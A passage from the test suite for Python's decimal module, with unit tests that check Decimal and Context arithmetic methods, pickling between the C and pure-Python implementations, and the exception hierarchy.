Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
